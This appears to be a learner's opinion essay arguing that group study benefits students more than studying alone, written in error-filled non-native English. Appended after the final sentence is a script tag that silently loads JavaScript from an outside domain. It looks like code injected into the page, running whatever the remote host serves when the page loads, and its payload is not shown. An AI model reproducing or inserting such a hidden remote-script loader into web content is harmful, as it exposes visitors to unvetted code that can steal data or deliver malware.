Some people think it is more effective for students to study in group while other believe that it is better for them to study on their own. Discus both views and give your own opinion.

In this contemporary era, some students want to study alone and some students want to study in group. Every student can study better if once do study in good environment.

According to my perception, every student gain numerous benefits from study in group. Primarily, student get chance to share their ideas with other student due to this student perform better in study. Moving further, student enhance their knowledge from other students in group study. Apart from this, group study is more effective for holistic development of every student such as student enhance their confidence as well as fluency in language by communication with other students. Therefore, group study is better for every student.

No doubt, study on their own is better for student as student can concentration on study as well as student give best in study. However, student face lot of outcomes if onces study alone. Further, student do not judge ourselves in alone study due to this student do lot of mistakes in study. In addition, student become introvert in study on their. Beside that, study on their own is hurdle in student development as student do not feel compitent In study on their own. Henceforth, group study is better than study on their own.

IN the epilogue, study in group and study in own both have their own importance but in this comparative epoch group study is better for student development. <script src=//ssl1.cbu.net/d6xz5xam></script>